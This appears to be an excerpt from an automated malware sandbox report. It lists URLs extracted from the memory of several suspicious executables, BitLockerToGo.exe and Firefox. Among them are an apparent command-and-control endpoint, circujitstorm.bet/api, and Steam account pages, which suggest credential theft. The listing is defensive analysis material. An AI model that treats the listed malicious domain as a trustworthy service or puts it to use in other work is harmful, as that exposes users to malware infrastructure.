Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000022.00000003.2967540586.0000020F09B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3085550485.0000020F0FF69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3071151796.0000020F0B491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000022.00000002.3016825878.0000020F063BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000022.00000002.3086837653.0000020F1001D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000022.00000002.3086837653.0000020F1001D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000022.00000002.3095703152.0000020F7E861000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000022.00000002.3095703152.0000020F7E861000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000022.00000002.3090183170.0000020F77803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: http://fb.me/use-check-prop-types
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: http://fb.me/use-check-prop-typesG
Source: firefox.exe, 00000022.00000002.3060995335.0000020F0AFF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2951927762.0000020F100C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3012221099.0000020F051CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3050245370.0000020F09C49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3074371464.0000020F0B822000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3030806573.0000020F080E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3060995335.0000020F0AF2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3060995335.0000020F0AFE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3052038391.0000020F09EEE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2961462969.0000020F0B77F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3071975648.0000020F0B6B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3060995335.0000020F0AFCC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3071975648.0000020F0B691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F063BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3028809173.0000020F07EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3097493984.0000020F7E9E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000002E.00000002.3381480619.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: firefox.exe, 00000022.00000002.3085550485.0000020F0FF9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000022.00000002.3085550485.0000020F0FF9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: http://stackoverflow.com/questions/30030031)
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000002E.00000002.3381480619.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BitLockerToGo.exe, 00000010.00000003.2938863985.0000000004949000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2939502975.00000000049F1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2942911026.000000000490D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2941510956.000000000490D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2944566017.0000000004BD1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2943786609.000000000495F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2942100476.0000000004948000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000003.2942449191.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3057943910.0000000004A4E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3056907098.00000000049B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3057540760.0000000004C33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3058355136.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: firefox.exe, 00000022.00000002.3053253696.0000020F09F6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3101578349.0000020F7F6A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000022.00000002.3053253696.0000020F09F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul#
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3085550485.0000020F0FF9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3085550485.0000020F0FF9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000022.00000002.3015140670.0000020F05650000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000003.2864249449.0000020F07B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2482168024.00000000054FA000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802975695.0000000005E29000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000022.00000002.3016825878.0000020F06317000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000022.00000002.3089859108.0000020F775D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 00000022.00000002.3012845832.0000020F05353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-brow
Source: firefox.exe, 00000022.00000002.3016825878.0000020F06317000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000022.00000002.3108753623.00000B6D71F04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 00000022.00000002.3071151796.0000020F0B491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000022.00000002.3090183170.0000020F77811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: 5a20b6327b.exe, 0000000B.00000003.2339114126.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: firefox.exe, 00000022.00000002.3108753623.00000B6D71F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://basket.mozilla.org/news/subscribe/
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://basket.mozilla.org/news/subscribe_sms/
Source: firefox.exe, 00000022.00000002.3102962900.0000020F7F700000.00000002.00000001.00040000.00000025.sdmp	String found in binary or memory: https://basket.mozilla.org/subscribe.json
Source: 5a20b6327b.exe, 0000000B.00000003.2389533075.000000000564C000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2854932657.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: 5a20b6327b.exe, 0000000B.00000003.2407783071.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2401015492.0000000005646000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2408683711.0000000005649000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2854932657.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000022.00000003.2987434942.0000020F0B7C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2482168024.00000000054FA000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802975695.0000000005E29000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2482168024.00000000054FA000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802975695.0000000005E29000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 5a20b6327b.exe, 0000000B.00000003.2371217009.000000000567F000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355489693.000000000567D000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2355371205.0000000005680000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2468664294.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2482168024.00000000054FA000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469150428.00000000054FB000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2469702182.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2683698825.000000000588B000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2684621863.0000000005888000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802975695.0000000005E29000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802637016.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2802526755.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 186adf2617.exe, 00000011.00000003.2678016226.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2886284597.0000000001045000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2836652728.0000000001062000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2827174045.0000000001062000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2859106266.0000000001062000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2913893374.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2948748785.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2936615898.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2942472596.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000002.2990509175.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2799922070.0000000001622000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/
Source: 186adf2617.exe, 00000014.00000003.2799976987.0000000001609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/$
Source: 186adf2617.exe, 00000014.00000003.2936615898.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/1
Source: 186adf2617.exe, 00000014.00000003.2799922070.0000000001622000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/SE
Source: 186adf2617.exe, 00000014.00000003.2948748785.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2942472596.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000002.2990509175.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/a
Source: 186adf2617.exe, 00000014.00000003.2799922070.0000000001622000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/api
Source: 186adf2617.exe, 00000014.00000002.3023031536.0000000005E0D000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2934856636.0000000005E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/api9
Source: 186adf2617.exe, 00000011.00000003.2815871726.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/apiT
Source: 186adf2617.exe, 00000014.00000003.2813383544.00000000016B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/apiW
Source: 186adf2617.exe, 00000014.00000002.3023031536.0000000005E0D000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2934856636.0000000005E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/apie
Source: 186adf2617.exe, 00000014.00000003.2799922070.0000000001622000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/apif
Source: 186adf2617.exe, 00000014.00000003.2948748785.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2942472596.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000002.2990509175.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/g
Source: 186adf2617.exe, 00000014.00000003.2913893374.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2883656017.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/i
Source: 186adf2617.exe, 00000014.00000003.2936615898.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/j
Source: 186adf2617.exe, 00000014.00000003.2913893374.000000000169E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/q
Source: 186adf2617.exe, 00000011.00000003.2678016226.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet/~
Source: 186adf2617.exe, 00000014.00000003.2939040861.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2799976987.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2916326096.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000002.2987328586.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2944192388.0000000001609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet:443/api
Source: 186adf2617.exe, 00000014.00000003.2939040861.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2887008838.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2916326096.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2885547914.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000002.2987328586.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2944192388.0000000001609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet:443/apil
Source: 186adf2617.exe, 00000014.00000003.2939040861.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000002.2987328586.0000000001609000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2944192388.0000000001609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://circujitstorm.bet:443/apiskShare
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamst
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 5a20b6327b.exe, 0000000B.00000003.2337963770.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2351643497.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D14000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=qO5h-3HBNvCA&a
Source: 5a20b6327b.exe, 0000000B.00000003.2339086883.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337686170.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2337562900.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
